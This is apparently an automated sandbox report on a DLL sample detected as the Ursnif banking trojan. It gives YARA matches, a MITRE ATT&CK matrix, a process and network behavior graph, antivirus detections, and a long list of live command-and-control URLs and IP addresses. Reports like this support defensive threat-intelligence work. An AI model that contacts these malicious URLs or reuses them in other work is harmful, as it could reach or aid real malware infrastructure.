            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10001DCF GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_10001DCF
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_1000169C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_1000169C
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C21BC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_010C21BC

            Stealing of Sensitive Information

            barindex
            Yara detected Ursnif
            Source: Yara matchFile source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Ursnif
            Source: Yara matchFile source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts2
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Obfuscated Files or Information            		1
            Input Capture            		1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Data Encrypted for Impact
            Default Accounts12
            Native API            		Boot or Logon Initialization Scripts112
            Process Injection            		1
            Software Packing            		LSASS Memory1
            Account Discovery            		Remote Desktop Protocol1
            Input Capture            		Exfiltration Over Bluetooth2
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            DLL Side-Loading            		Security Account Manager1
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Masquerading            		NTDS114
            System Information Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer2
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
            Virtualization/Sandbox Evasion            		LSA Secrets11
            Security Software Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common112
            Process Injection            		Cached Domain Credentials11
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Regsvr32            		DCSync2
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Rundll32            		Proc Filesystem1
            System Owner/User Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
            Remote System Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 557481 Sample: Wartless_v8.8.9.0.dll Startdate: 21/01/2022 Architecture: WINDOWS Score: 100 67 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->67 69 Multi AV Scanner detection for domain / URL 2->69 71 Found malware configuration 2->71 73 5 other signatures 2->73 7 loaddll32.exe 7 2->7         started        11 iexplore.exe 2 68 2->11         started        13 iexplore.exe 2->13         started        15 2 other processes 2->15 process3 dnsIp4 61 www.nnnnnn.casa 7->61 63 nnnnnn.casa 7->63 65 3 other IPs or domains 7->65 85 Found evasive API chain (may stop execution after checking system information) 7->85 87 Found API chain indicative of debugger detection 7->87 89 Writes or reads registry keys via WMI 7->89 91 Writes registry values via WMI 7->91 17 regsvr32.exe 6 7->17         started        21 cmd.exe 1 7->21         started        23 rundll32.exe 6 7->23         started        25 iexplore.exe 32 11->25         started        27 iexplore.exe 29 11->27         started        29 iexplore.exe 32 11->29         started        31 iexplore.exe 11->31         started        33 4 other processes 13->33 35 8 other processes 15->35 signatures5 process6 dnsIp7 41 www.nnnnnn.casa 17->41 75 System process connects to network (likely due to code injection or exploit) 17->75 77 Writes or reads registry keys via WMI 17->77 79 Writes registry values via WMI 17->79 37 rundll32.exe 6 21->37         started        49 2 other IPs or domains 23->49 43 intermedia.bar 31.41.46.120, 49744, 49745, 49746 ASRELINKRU Russian Federation 25->43 45 nnnnnn.casa 192.64.119.233, 49798, 49799, 49800 NAMECHEAP-NETUS United States 33->45 51 7 other IPs or domains 33->51 47 nnnnnn.bar 162.255.119.177, 49864, 49865, 49874 NAMECHEAP-NETUS United States 35->47 53 4 other IPs or domains 35->53 signatures8 process9 dnsIp10 55 198.54.117.215, 49885, 80 NAMECHEAP-NETUS United States 37->55 57 www.nnnnnn.casa 37->57 59 4 other IPs or domains 37->59 81 System process connects to network (likely due to code injection or exploit) 37->81 83 Writes registry values via WMI 37->83 signatures11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Wartless_v8.8.9.0.dll20%VirustotalBrowse
            Wartless_v8.8.9.0.dll14%ReversingLabs
            Wartless_v8.8.9.0.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.loaddll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            6.2.rundll32.exe.4210000.1.unpack100%AviraHEUR/AGEN.1108158Download File
            9.2.rundll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            9.2.rundll32.exe.4440000.1.unpack100%AviraHEUR/AGEN.1108158Download File
            5.2.regsvr32.exe.4f90000.1.unpack100%AviraHEUR/AGEN.1108158Download File
            5.2.regsvr32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            6.2.rundll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            1.2.loaddll32.exe.10c0000.1.unpack100%AviraHEUR/AGEN.1108158Download File

            Domains

            SourceDetectionScannerLabelLink
            nnnnnn.bar13%VirustotalBrowse
            nnnnnn.casa13%VirustotalBrowse
            www.nnnnnn.casa7%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGd100%Avira URL Cloudmalware
            http://intermedia.bar/drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk0%Avira URL Cloudsafe
            http://nnnnnn.bar/drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk100%Avira URL Cloudmalware
            http://nnnnnn.bar/.x100%Avira URL Cloudmalware
            http://intermedia.bar/drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87/xXKn3PzxfNPne/1IWtDw4e/zao8w3_2FqS1tUowEpdILrG/AQc_2F2CTQ/Kg84n698KmhLQ87R8/T3KY8S12PpxD/H69sMspGVxv/is2jKybUtpc7W2/tjpg5c_2BM2CHgmR9sa3h/opwZ5u985b9SYlvV/9nvFId2LU1FOjTP/3gzCgoFC/zqOGqAVh/K.jlk0%Avira URL Cloudsafe
            http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk100%Avira URL Cloudmalware
            http://intermedia.bar/drew/zd0veKiw3e_2FVw/JJ7tbavOiQvA9d8rHF/MReVkRvio/SC3uRIruy_2BXo_2FvjQ/5wwzMoShaTYrGjtEhg7/Q4EU_2F58MrLDOMpnwDvQl/4oAzAGZ9KhB2P/11ho7azQ/oSQaJwmg4Z33JCzj8wVAL4y/p2pAzghuFr/NTjo_2FX5hnFJvVKJ/pSUsYhZ3ii5t/IXWGFfzs8Ne/P3kSZsDcK04c9o/M4TxQU3QgnIS7BTTFhUW8/eYRw_2Bi9Rap_2/FlW.jlk0%Avira URL Cloudsafe
            http://nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk100%Avira URL Cloudmalware
            http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd100%Avira URL Cloudmalware
            http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk100%Avira URL Cloudmalware
            http://intermedia.bar/drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V10%Avira URL Cloudsafe
            http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bg100%Avira URL Cloudmalware
            http://nnnnnn.bar100%Avira URL Cloudmalware
            http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk100%Avira URL Cloudmalware
            http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5100%Avira URL Cloudmalware
            http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk100%Avira URL Cloudmalware
            http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk100%Avira URL Cloudmalware
            http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F100%Avira URL Cloudmalware
            http://intermedia.bar/drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk0%Avira URL Cloudsafe
            http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk100%Avira URL Cloudmalware
            http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBV100%Avira URL Cloudmalware
            http://intermedia.bar/drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff0%Avira URL Cloudsafe
            http://intermedia.bar/drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr30%Avira URL Cloudsafe
            http://intermedia.bar/drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQ0%Avira URL Cloudsafe
            http://intermedia.bar/drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQT/SmvkeHiBSVF/jSdieAe6QVgPYk/Ls60EE1RdzPENlayPGjHS/AIjKP7dUycBtEyrA/RFerBbxZvrxnd_2/Bc1S7J_2FQDJBAH3dG/kHsLUg6CP/6tr_2F_2FmCAcHtuBxvU/3I9dXvsa3LnrU2f8IF1/dsxBAmQu5x_2BsDF7qQMQs/L_2FeC4tc/dGJ.jlk0%Avira URL Cloudsafe
            http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP100%Avira URL Cloudmalware
            http://intermedia.bar/drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr3wnTfM22OhIhFDrhX/abhGbeDg_2/F32j7cFeBDC9GyCao/m10xhdMb4CCa/7HwtF9C64_2/F3b31QlJIQy42X/zsnIbRG3JRJ596u8kc4vW/CJEx7Xa659BvZ2yV/10sCxMgGuLgu5f6/Z9JRI8lQTnPNjwZZMu/mc129Uq8I/WlhkxbiPfyst/snQ.jlk0%Avira URL Cloudsafe
            http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk100%Avira URL Cloudmalware
            http://intermedia.bar/ws0%Avira URL Cloudsafe
            http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk100%Avira URL Cloudmalware
            http://intermedia.bar/drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz0%Avira URL Cloudsafe
            http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH8100%Avira URL Cloudmalware
            http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk100%Avira URL Cloudmalware
